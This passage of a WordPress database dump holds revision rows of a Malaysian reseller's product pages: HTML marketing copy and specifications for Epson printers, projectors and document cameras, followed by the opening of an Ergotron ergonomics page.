src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" />\r\n\r\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.\r\n\r\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.</em>\r\n<ul>\r\n 	<li>High Brightness</li>\r\n 	<li>Beyond Full HD Resolution</li>\r\n 	<li>Powered Lens</li>\r\n 	<li>Portrait Projection</li>\r\n 	<li>Flexible Installation</li>\r\n 	<li>Edge Blending</li>\r\n 	<li>Point Correction</li>\r\n</ul>\r\n3.Â Epson EB-Z10000UÂ <img class=\"alignnone  wp-image-2443\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" />\r\n\r\nDiscover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.\r\n<ul>\r\n 	<li>White and Colour Brightness at 10,000Â lm</li>\r\n 	<li>WUXGA resolution</li>\r\n 	<li>High Reliability and Durability</li>\r\n 	<li>Suitable for 24/7 usage</li>\r\n 	<li>Flexible projection angles and installations</li>\r\n</ul>\r\n<h3>DOCUMENT CAMERAS</h3>\r\n<ol>\r\n 	<li>Document Camera ELPDC21Â <img class=\"alignnone  wp-image-2444\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></li>\r\n</ol>\r\nCut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.\r\n<ul>\r\n 	<li>Pixels: 2MP (1920 x 1080 pixels)</li>\r\n 	<li>Camera Sensor: 1/2.7 inch CMOS Sensor</li>\r\n 	<li>Resolution: Up to Full HD (1080p)</li>\r\n 	<li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li>\r\n 	<li>Weight: Approx 3.0kg</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-18 20:47:18','2018-12-18 12:47:18','',1486,'https://bintara.com.my/blog/2018/12/18/1486-revision-v1/',0,'revision','',0),(2212,1,'2018-12-15 19:05:06','2018-12-15 11:05:06','As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.\r\n<h1>Printers for Work</h1>\r\nEpson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.\r\n<h3>BUSINESS INKJET PRINTER</h3>\r\n<ol>\r\n 	<li>Epson WorkForce Enterprise WF-C17590Â <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/4bfd14bf0ccc2f6644cf16a8f4b0c1caa3f66f86/1200Wx1200H?use=banner&amp;assetDescr=WF-C20590_01_2-1\" alt=\"Epson WorkForce Enterprise WF-C17590 A3 Colour Multifunction Printer\" width=\"378\" height=\"213\" /></li>\r\n</ol>\r\nOur massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.\r\n<ul>\r\n 	<li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li>\r\n 	<li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li>\r\n 	<li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li>\r\n</ul>\r\n2.Â Epson WorkForce Pro WF-C5290Â <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/95d79276f2693002c4a7ee97d5277d276018fd1b/1200Wx1200H?use=banner&amp;assetDescr=WF-C5290_01-1\" alt=\"Epson WorkForce Pro WF-C5290 Wi-Fi Duplex Inkjet Printer\" width=\"378\" height=\"213\" />\r\n\r\nEnjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.\r\n<ul>\r\n 	<li>High yield ink packs</li>\r\n 	<li>High-speed auto-duplex printing</li>\r\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\r\n 	<li>Epson Connect</li>\r\n 	<li>EnergyÂ saving</li>\r\n</ul>\r\n3.Â Epson WorkForce WF-100Â <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/ca3a9c9cf8e1a2b9715f0de7545a80540d82c3e1/1200Wx1200H?use=banner&amp;assetDescr=WF100_550px-X-310px\" alt=\"Epson WorkForce WF-100 Wi-Fi Inkjet Printer\" width=\"378\" height=\"213\" />\r\n\r\nIntroducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.\r\n<ul>\r\n 	<li>Print speed up to 14 ppm</li>\r\n 	<li>Epson Connect</li>\r\n 	<li>1.44 Colour LCD Panel</li>\r\n 	<li>Wi-Fi and Wi-Fi Direct connectivity</li>\r\n 	<li>Built-in battery</li>\r\n</ul>\r\n4.Â Epson WorkForce WF-7711Â <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/8780153cfc7a956b15116428fd984ecedb8fc4ac/1200Wx1200H?use=banner&amp;assetDescr=WF-7711_Black_01-1\" alt=\"Epson WorkForce WF-7711 A3 Wi-Fi Duplex All-in-One Inkjet Printer\" width=\"277\" height=\"156\" />\r\n\r\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\r\n<ul>\r\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\r\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\r\n 	<li>Duplex printing up to A3 size</li>\r\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\r\n 	<li>4.3â€ Colour LCD Touch Panel</li>\r\n 	<li>Print, Scan, Copy Fax with ADF</li>\r\n</ul>\r\n<h3>INK TANK SYSTEM</h3>\r\n<ol>\r\n 	<li>Epson EcoTank L3150Â <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/546bba21bfcca4c19645421e67c221a0bb36dde0/1200Wx1200H?use=banner&amp;assetDescr=L3150_01_2-1\" alt=\"Epson EcoTank L3150 Wi-Fi All-in-One Ink Tank Printer\" width=\"279\" height=\"157\" /></li>\r\n</ol>\r\nSave more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.\r\n<ul>\r\n 	<li>Compact integrated tank design</li>\r\n 	<li>High yield ink bottles</li>\r\n 	<li>Spill-free, error-free refilling</li>\r\n 	<li>Wi-Fi, Wi-Fi Direct</li>\r\n 	<li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li>\r\n 	<li>Borderless printing up to 4R</li>\r\n</ul>\r\n2.Â Epson L120 PrinterÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/d3523ca198cc00b6e4d7cc7cd33e805efa394883/1200Wx1200H?use=banner&amp;assetDescr=L120_550x310\" alt=\"Epson L120 Ink Tank Printer\" width=\"279\" height=\"157\" />\r\n\r\nThe Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.\r\n<ul>\r\n 	<li>High-yield ink bottles</li>\r\n 	<li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li>\r\n 	<li>Compact Size</li>\r\n 	<li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li>\r\n</ul>\r\n3.Â Epson M1100 PrinterÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/e88f14c854b2b41eb94466bb164b30d239b37249/1200Wx1200H?use=banner&amp;assetDescr=M1100_02_2-1\" alt=\"Epson EcoTank Monochrome M1100 Ink Tank Printer\" width=\"277\" height=\"156\" />\r\n\r\nEfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.\r\n<ul>\r\n 	<li>Compact integrated tank design</li>\r\n 	<li>High-yield pigment ink bottle</li>\r\n 	<li>Spill-free, error-free refilling</li>\r\n 	<li>Print speed up to 32ppm (15ipm)</li>\r\n 	<li>4 years warranty</li>\r\n</ul>\r\n<h3>LASER PRINTER</h3>\r\n<ol>\r\n 	<li>Epson AcuLaser C9300NÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/6592876617c4898f9ca960c5b2956bcd90828b2b/1200Wx1200H?use=banner&amp;assetDescr=C9300N-%28550-x-310%29\" alt=\"Epson AcuLaser C9300N\" width=\"277\" height=\"156\" /></li>\r\n</ol>\r\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\r\n<ul>\r\n 	<li>1200 x 1200 dpi</li>\r\n 	<li>Speed: Up to 30ppm</li>\r\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\r\n 	<li>Quality prints with new Epson Technologies</li>\r\n 	<li>New print job management features</li>\r\n</ul>\r\n2.Â Epson WorkForce AL-M320DNÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/50b38a998b7c07b1b09a8e2bc2445a48deea5503/1200Wx1200H?use=banner&amp;assetDescr=17Bul_SXH_WW_01\" alt=\"Epson WorkForce AL-M320DN Mono Laser Printer\" width=\"237\" height=\"276\" />\r\n\r\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\r\n<ul>\r\n 	<li>1200 x 1200 dpi</li>\r\n 	<li>Print speed up to 35ppm</li>\r\n 	<li>Auto-Duplex</li>\r\n 	<li>Ethernet &amp; Epson iPrint</li>\r\n 	<li>2 optional paper cassette tray</li>\r\n</ul>\r\n3.Â Epson WorkForce AL-M8100DNÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/0638685e7cdda8ba7546a1b736d674d278351865/1200Wx1200H?use=banner&amp;assetDescr=M8100DN%28550-x-310%29\" alt=\"Epson WorkForce AL-M8100DN Mono Laser Printer\" width=\"279\" height=\"158\" />\r\n\r\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\r\n<ul>\r\n 	<li>1200 x 1200 dpi</li>\r\n 	<li>Print speed up to 40 ppm</li>\r\n 	<li>Epson iPrint</li>\r\n 	<li>Ethernet</li>\r\n 	<li>4 optional cassette trays</li>\r\n</ul>\r\n<h3>POS PRINTER</h3>\r\n<ol>\r\n 	<li>Epson TM-H6000IVÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/9e753de8f093fbd54180d30e79856994029829e4/1200Wx1200H?use=banner&amp;assetDescr=TM-H6000II-%28550-x-310%29\" alt=\"Epson TM-H6000IV Hybrid Receipt Printer\" width=\"277\" height=\"156\" /></li>\r\n</ol>\r\nThe Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.\r\n<ul>\r\n 	<li>Thermal &amp; Dot Output</li>\r\n 	<li>Speed: Up to 300mm/sec</li>\r\n 	<li>Check printing</li>\r\n 	<li>Bi-directional printing</li>\r\n 	<li>SupportsÂ slip printing, validation and endorsement print</li>\r\n</ul>\r\n2.Â Epson TM-T88V-iÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/b5f2f575d58aaa567e4b733faa8e0e06d85f49a9/1200Wx1200H?use=banner&amp;assetDescr=TM-T88V-i%20550px%20X%20310px\" alt=\"Epson TM-T88V-i Intelligent Thermal POS Receipt Printer\" width=\"279\" height=\"157\" />\r\n\r\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\r\n<ul>\r\n 	<li>Printing speed of up to 300mm/second</li>\r\n 	<li>20 million lines for printer mechanism</li>\r\n 	<li>Up to 2 million for auto-cutter</li>\r\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\r\n 	<li>Control peripherals easily</li>\r\n</ul>\r\n3.Â Epson TM-T70IIÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/442ecb8e3b6241474ecf3fe6e7a81b2415e006bc/1200Wx1200H?use=banner&amp;assetDescr=TM-T70II-%28550-x-310%29\" alt=\"Epson TM-T70II Thermal POS Receipt Printer\" width=\"277\" height=\"156\" />\r\n\r\nThe Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.\r\n<ul>\r\n 	<li>Print method: Thermal line printing</li>\r\n 	<li>Width: 79Â Â±Â 0.5 mm</li>\r\n 	<li>Print Speed: Up to 250 mm/ sec</li>\r\n 	<li>Auto-cutter feature</li>\r\n</ul>\r\n<h3>PHOTO PRINTER</h3>\r\n<ol>\r\n 	<li>Epson L1800 PrinterÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/c03afaad5b3d62a52ebac764f0348a0e55dbe666/1200Wx1200H?use=banner&amp;assetDescr=L1800_550-x-310\" alt=\"Epson L1800 A3 Photo Ink Tank Printer\" width=\"279\" height=\"157\" /></li>\r\n</ol>\r\nIn creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.\r\n<ul>\r\n 	<li>Yield of up to 1,500 4R photos</li>\r\n 	<li>Print speed up to 15ppm</li>\r\n 	<li>High-yield ink bottles</li>\r\n 	<li>1-year warranty or 9,000 prints</li>\r\n</ul>\r\n2.Â Epson L850 PrinterÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/50192a6d31585688efca5c6967934be8b8e325e3/1200Wx1200H?use=banner&amp;assetDescr=L850_image_550x310\" alt=\"Epson L850 Photo All-in-One Ink Tank Printer\" width=\"278\" height=\"157\" />\r\n\r\nImaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.\r\n<ul>\r\n 	<li>High-yield ink bottles</li>\r\n 	<li>2.7 colour LCD screen</li>\r\n 	<li>Direct printing via memory card slot, USB port and PictBridge</li>\r\n 	<li>CD/DVD printing</li>\r\n 	<li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li>\r\n</ul>\r\n3.Â Epson L805 PrinterÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/e80a2ca4d15de320831da0645e9465fce4a469d6/1200Wx1200H?use=banner&amp;assetDescr=L805_550pxX310px\" alt=\"Epson L805 Wi-Fi Photo Ink Tank Printer\" width=\"277\" height=\"156\" />\r\n\r\nThe L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.\r\n<ul>\r\n 	<li>Yield of Up to 1,800 4R photos</li>\r\n 	<li>Lowest Printing Costs</li>\r\n 	<li>Wi-Fi &amp; Epson iPrint</li>\r\n 	<li>CD/DVD Printing Capability</li>\r\n 	<li>1 year or 3,000 prints warranty</li>\r\n</ul>\r\n<h1>Projectors for Work</h1>\r\nEpson has the best projector for your business, from education solutions to conference room projectors.\r\n<h3><strong>CORPORATE AND EDUCATIONÂ </strong></h3>\r\n<ol>\r\n 	<li>Epson EB-2055<img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/d7d4da639d1d6b717ecba006d695944a9b8bdeb1/1200Wx1200H?use=banner&amp;assetDescr=EB-2055_03\" alt=\"Epson EB-2055 XGA 3LCD Projector\" width=\"278\" height=\"185\" /></li>\r\n</ol>\r\nLeave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.\r\n<ul>\r\n 	<li>XGA Resolution</li>\r\n 	<li>White and Colour Light Output at 5,000 lumens</li>\r\n 	<li>Gesture Presenter</li>\r\n 	<li>Multi-PC Projection</li>\r\n 	<li>2 x HDMI</li>\r\n 	<li>Split Screen</li>\r\n</ul>\r\n2.Â Epson EB-2142WÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/4f8fa6de33b21276fff65b8dd44b8f5345cdde2e/1200Wx1200H?use=banner&amp;assetDescr=2142W_a3_No.3-1\" alt=\"Epson EB-2142W WXGA 3LCD Projector\" width=\"277\" height=\"156\" />\r\n\r\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\r\n<ul>\r\n 	<li>White and Colour Brightness at 4,200lm</li>\r\n 	<li>WXGA Resolution</li>\r\n 	<li>12000 hours lamp life in eco-mode</li>\r\n 	<li>MHL-enabled</li>\r\n 	<li>Multi-PC Projection</li>\r\n 	<li>Horizontal Keystone Slider</li>\r\n 	<li>Miracast<sup>Â®</sup></li>\r\n</ul>\r\n3.Â Epson EB-L500WÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/fce1119a7b9cc2067d5f2e832322067ba6157d25/1200Wx1200H?use=banner&amp;assetDescr=L500W_Wh_01-1_1\" alt=\"Epson EB-L500W Wireless WXGA 3LCD Laser Projector\" width=\"279\" height=\"157\" />\r\n\r\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\r\n<ul>\r\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\r\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\r\n 	<li>Laser light source of up to 20,000 hours</li>\r\n 	<li>Virtually maintenance-free for optical engine life</li>\r\n</ul>\r\n<h3>ACCENT LIGHTING LASER PROJECTORS</h3>\r\n<ol>\r\n 	<li>Epson LightScene EV-105Â <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/b6c7b40a88d2c98a3d3ed36161df07d31a9141f5/1200Wx1200H?use=banner&amp;assetDescr=lightscene105_hero-left_690x460\" alt=\"Epson LightScene EV-105 Accent Lighting 3LCD Laser Projector\" width=\"279\" height=\"186\" /></li>\r\n</ol>\r\nCreate stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.\r\n<ul>\r\n 	<li>Laser projector for digital art and signage</li>\r\n 	<li>Seamlessly blends into virtually any environment</li>\r\n 	<li>Up to 20,000 hours of virtually maintenance-free operation</li>\r\n 	<li>360-degree mounting: floors, walls or ceilings</li>\r\n 	<li>Remote management and control tools</li>\r\n 	<li>Best New Award Overall</li>\r\n</ul>\r\n<h3>ULTRA PORTABLE</h3>\r\n<ol>\r\n 	<li>Epson EB-1785WÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/577e9be752487862d596ea9caff7e7ed052565e9/1200Wx1200H?use=banner&amp;assetDescr=EB1700_%28550-x-310%29\" alt=\"Epson EB-1785W Wireless WXGA 3LCD Projector\" width=\"279\" height=\"157\" /></li>\r\n</ol>\r\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\r\n<ul>\r\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\r\n 	<li>WXGA Resolution</li>\r\n 	<li>Real-Time Auto Keystone Correction</li>\r\n 	<li>Split Screen Projection</li>\r\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\r\n</ul>\r\n<h3>INTERACTIVE</h3>\r\n<ol>\r\n 	<li>Epson EB-536WiÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/df5f7fc22ae0c3381ae654eb48ad8ea1b5287aa6/1200Wx1200H?use=banner&amp;assetDescr=536Wi_%28550-x-310%29\" alt=\"Epson EB-536Wi Short Throw Interactive WXGA 3LCD Projector\" width=\"279\" height=\"157\" /></li>\r\n</ol>\r\nProject large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.\r\n<ul>\r\n 	<li>White and Colour Brightness at 3,400lm</li>\r\n 	<li>WXGA Resolution</li>\r\n 	<li>Multi-PC projection</li>\r\n 	<li>HDMI Connectivity</li>\r\n 	<li>Pen Interactivity</li>\r\n</ul>\r\n2.Â Epson 595Wi/585Wi/575WiÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/acd0b6c16039fd43050cd5121b129b6046314ed4/1200Wx1200H?use=banner&amp;assetDescr=EB-595Wi-585Wi-575Wi-585W-575W-580-570%28550-x-310%29\" alt=\"Epson 595Wi/585Wi/575Wi Ultra-Short Throw Interactive WXGA 3LCD Projector\" width=\"277\" height=\"156\" />\r\n\r\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\r\n<ul>\r\n 	<li>WXGA Resolution</li>\r\n 	<li>White and Colour Brightness at 3,300lm</li>\r\n 	<li>Multi-PC projection</li>\r\n 	<li>HDMI Connectivity x2</li>\r\n</ul>\r\n<h3>HIGH BRIGHTNESS</h3>\r\n<ol>\r\n 	<li>Epson EB-L1405UNLÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/5faf7da675774cb63fed0b60af2df9bb26eda23a/1200Wx1200H?use=banner&amp;assetDescr=EB-L1405U-%28550-x-310%29\" alt=\"Epson EB-L1405UNL Laser WUXGA 3LCD Projector without Lens\" width=\"279\" height=\"157\" /></li>\r\n</ol>\r\nThe Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.\r\n<ul>\r\n 	<li>White and Colour Brightness at 8,000lm</li>\r\n 	<li>WUXGA (1920 x 1200)</li>\r\n 	<li>Edge-blending to create large panoramic images</li>\r\n 	<li>Curve and corner wall projection</li>\r\n 	<li>HDBaseT</li>\r\n</ul>\r\n2.Â Epson EB-G7400UNLÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/f32a4263655ce3cee553e968f243aff2e7dd0117/1200Wx1200H?use=banner&amp;assetDescr=EB-G7000_W%28550-x-310%29\" alt=\"Epson EB-G7400UNL WUXGA 3LCD Projector without Lens &amp; 4K Enhancement\" width=\"278\" height=\"157\" />\r\n\r\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.\r\n\r\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.</em>\r\n<ul>\r\n 	<li>High Brightness</li>\r\n 	<li>Beyond Full HD Resolution</li>\r\n 	<li>Powered Lens</li>\r\n 	<li>Portrait Projection</li>\r\n 	<li>Flexible Installation</li>\r\n 	<li>Edge Blending</li>\r\n 	<li>Point Correction</li>\r\n</ul>\r\n3.Â Epson EB-Z10000UÂ <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/d4303d623aaae5c1f5ab8d7ef0f3a105001b2b07/1200Wx1200H?use=banner&amp;assetDescr=Epson_EB-Z_Series%28550-x-310%29\" alt=\"Epson EB-Z10000U WUXGA 3LCD Projector with Standard Lens\" width=\"277\" height=\"156\" />\r\n\r\nDiscover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.\r\n<ul>\r\n 	<li>White and Colour Brightness at 10,000Â lm</li>\r\n 	<li>WUXGA resolution</li>\r\n 	<li>High Reliability and Durability</li>\r\n 	<li>Suitable for 24/7 usage</li>\r\n 	<li>Flexible projection angles and installations</li>\r\n</ul>\r\n<h3>DOCUMENT CAMERAS</h3>\r\n<ol>\r\n 	<li>Document Camera ELPDC21Â <img class=\"\" src=\"https://mediaserver.goepson.com/ImConvServlet/imconv/58b51c630f556b75b78c78c7e8e904c2241279a6/1200Wx1200H?use=banner&amp;assetDescr=ELPDC21_01\" alt=\"ELPDC21 Full HD 1080p Document Camera\" width=\"277\" height=\"184\" /></li>\r\n</ol>\r\nCut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.\r\n<ul>\r\n 	<li>Pixels: 2MP (1920 x 1080 pixels)</li>\r\n 	<li>Camera Sensor: 1/2.7 inch CMOS Sensor</li>\r\n 	<li>Resolution: Up to Full HD (1080p)</li>\r\n 	<li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li>\r\n 	<li>Weight: Approx 3.0kg</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-15 19:05:06','2018-12-15 11:05:06','',1486,'https://bintara.com.my/blog/2018/12/15/1486-revision-v1/',0,'revision','',0),(2213,1,'2019-09-26 16:43:15','2019-09-26 08:43:15','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\n&nbsp;\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\n<h4>1. Ergonomics</h4>\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\n<h4>2. Environment</h4>\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\n<h4>3. Research</h4>\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\n<h4>4. Quality Tested</h4>\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\n<h4>5. Patents</h4>\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\n\n&nbsp;\n  <h1>Standing Desks</h1>\n  Sit less. Stand more. Feel the difference.\n\n\n  <h3>1. WorkFit-Z Mini</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\n        </td>\n        <td>\n          Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h3>2.Â 